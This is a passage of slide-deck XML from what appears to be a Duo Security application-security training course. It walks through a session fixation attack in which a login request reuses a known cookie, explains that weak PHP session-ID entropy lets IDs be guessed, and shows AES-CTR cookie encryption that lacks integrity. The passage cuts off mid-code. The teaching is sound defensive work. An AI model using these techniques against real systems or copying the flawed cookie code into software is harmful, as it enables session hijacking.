            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p168"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1102438" y="2088700"/>
            <a:ext cx="5400" cy="2599500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p168"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="2458588"/>
            <a:ext cx="6843000" cy="11400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128250" y="2520902"/>
            <a:ext cx="6843000" cy="3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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>2. Duo redirects the user to login and with a reference to “/groups” after login</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128250" y="2924125"/>
            <a:ext cx="6843000" cy="6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lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>3. User logs in sending their previous session cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">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i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>     POST /login</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>     username=user&amp;password=password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>     Cookie: session=123456789</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">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i="1">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b="1">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b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p168"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8031238" y="2088700"/>
            <a:ext cx="5400" cy="2599500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p168"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1159750" y="2937963"/>
            <a:ext cx="6848400" cy="15300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1185" name="Google Shape;1185;p168"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="3795395"/>
            <a:ext cx="6843000" cy="11400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="Google Shape;1186;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="3761425"/>
            <a:ext cx="68430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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>4. Redirect user to their original destination /groups without refreshing session cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">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i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>     302 Found</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">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i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>     Location: /groups</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">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b="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p168"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162450" y="4421363"/>
            <a:ext cx="6848400" cy="15300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="Google Shape;1188;p168"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230400" y="4486725"/>
            <a:ext cx="6843000" cy="4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b="1">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Attacker now has a valid and active session for the target</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>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69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="7570200" cy="25338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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Sessions are usually intended to end when the browser exits, a user logs out, or after a set amount of time</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A session has not actually ended until it is invalidated on the server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To invalidate a session properly, use your framework methods</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>: session_destroy()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ASP.NET MVC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>: FormsAuthentication.SignOut()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-292100" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>: session.invalidate()</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p169"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="58899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Should a Session “End?”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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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PHP: An Example of Bad Session IDs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p170"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048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PHP’s session_start() didn’t generate enough entropy for session IDs</a:t>
            </a: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1201" name="Google Shape;1201;p170"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1744250"/>
          <a:ext cx="7677725" cy="2590620"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{33D0C5A7-A392-4A63-A77E-500D87993C42}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2150975">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1174775">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="43519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solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>IP Address</a:t>
                      </a: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32 bits</a:t>
                      </a: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Except IP is known… so </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="E06666"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0-bits</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="E06666"/>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FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Epoch</a:t>
                      </a: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32 bits</a:t>
                      </a:r>
                      <a:endParaRPr strike="sngStrike">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Except the time is known…. so </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="E06666"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>0-bits</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Microseconds</a:t>
                      </a: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32 bits</a:t>
                      </a:r>
                      <a:endParaRPr strike="sngStrike">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Except there’s not that many values … so </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="E06666"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>20-bits</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Random value</a:t>
                      </a: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64 bits</a:t>
                      </a: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Except it used poor entropy… so </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="E06666"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>20-bits</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>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r" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Total</a:t>
                      </a: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160 bits</a:t>
                      </a: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But it’s really only </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="E06666"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>40-bits</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>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rPr>
                        <a:t>Can be reduced further by precomputing lcg_value()’s. So….. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="E06666"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>20-bits</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>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35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450" y="347875"/>
            <a:ext cx="7776000" cy="26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Introduction to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="4800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t>Application Security</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="920" name="Google Shape;920;p135"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="2816825"/>
            <a:ext cx="5576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Application Security Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="363F44"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Duo Security</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="363F4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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2620050" y="1217700"/>
            <a:ext cx="6524100" cy="196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20 bits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207" name="Google Shape;1207;p171"/>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b="1"/>
              <a:t>is ~1 million cookies</a:t>
            </a:r>
            <a:endParaRPr sz="30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Encrypted Cookies Are Not Enough</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;p172"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47150" y="1017725"/>
            <a:ext cx="9096900" cy="35511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Developers often encrypt cookie payloads assuming it cannot be changed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>does not provide integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>! Attackers can modify an encrypted cookie without knowing the key</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>encryptCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>(payload, key, iv):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    obj = AES.new(key, AES.MODE_CTR, iv)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    str1 = padding(payload)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    ciphertext = obj.encrypt(str1)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
